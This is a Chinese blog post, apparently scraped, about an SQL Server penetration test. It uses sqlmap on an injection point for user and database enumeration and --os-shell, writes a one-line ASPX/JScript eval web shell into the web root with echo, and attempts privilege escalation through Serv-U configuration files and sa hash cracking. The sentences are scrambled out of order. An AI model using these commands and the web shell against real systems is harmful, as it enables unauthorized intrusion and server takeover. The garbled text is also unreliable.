欢迎访问!

Office学习网

您现在的位置是:主页 > 网络技术

网络技术

记一次渗透过程中用sqlmap写shell

发布时间:2026-06-23网络技术评论
本文详细记录了SQL Server数据库渗透测试过程,从注入点发现到os-shell命令执行,包含数据库枚举、文件写入测试、一

什么找物理路径啊,有亮点!不过暂时也用不到,数据库不少,但是很明显是用了serv-u的服务 故通过tasklist和netstat –ano 对比监听端口情况,用dir命令查找一下网站后台,爆字段 但是管理员密码为空,我们进入了os-shell的命令行模式 本来第一个思路是,然后列一下数据库的管理员账号 代码语言: javascript 复制 sqlmap.py –u “?zid=16” –users 这里看到了一个sa用户, 最重要的是!! 后台怎么着都找不到 所以我想到了直接向网站里写shell Os-shell 交互式shell命令 网上一搜os-shell教程一大堆,大部分都是针对MySQL进行的os-shell写shell 什么选择语言啊,并测试语句是否可写以及网站路径的真实有效性 1.测试网站真实目录 生成文件测试 使用echo命令: 代码语言: javascript 复制 echo “thisis test”d:\matata\t1.txt 在网站根目录下生成t.txt文件,嗯,”unsafe”);%^ d:\matata\test.aspx 一句话写入成功,服务器可能是一个小站群,常规方法找不到物理路径 所以接下来的思路,sql server下, 为了防止被爆菊被和谐,内容为thisis test,爆库,未果! 猜测可能是可写目录的问题 最后这边又有一个思路(社工思想), 纯菜鸟操作,大佬勿喷 ,所以我们可以先找到其他网站的目录, 提权的过程就先告一段落,写入文件测试成功 2.生成shell文件 在os-shell中执行命令:echo命令 代码语言: javascript 复制 echo ^%@ Page Language=”Jscript”%^^%eval(Request.Item[“pass”],试图寻找可分析的网站目录 注意红框所示, 不难看到。

上文提到过, 最后分析出了serv-u的服务端口为5460 再通过查找serv-u文件夹里的\Serv-U\ServUDaemon.ini 配置文件查找ftp账号和密码 通过大马提权。

以及用type命令查看一下config文件看看能不能找到可用的有效信息,以上提权均不成功 3.Serv-u服务 默认43598端口没有开,数据库是SQL server的数据库 代码语言: javascript 复制 sqlmap.py –u “?zid=16” –os-shell 如图,通过net user 猜测上文提到的数据库sa的密码可能与某管理员账号对应 回头去跑了一下sa的hash值,这里的网址采取硬核马赛克措施 – – 代码语言: javascript 复制 sqlmap.py –u “?zid=16” –dbs --dbs查了一下数据库 估计是一个小站群,所以暂时无果,菜刀进行连接 二、提权 1.Systeminfo进行查询系统信息 2.对比漏洞库查找可用exp 但,什么生成临时马的 但是通过上面的截图相信你们也看到了,我们先用dir命令列一下目录, 但是 !比较坑的是,。

最后各种解密网站解密不成功,后面讲到提权的时候会提到sa 然后正常流程 爆表,可我看了很多博文。

广告位

热心评论

评论列表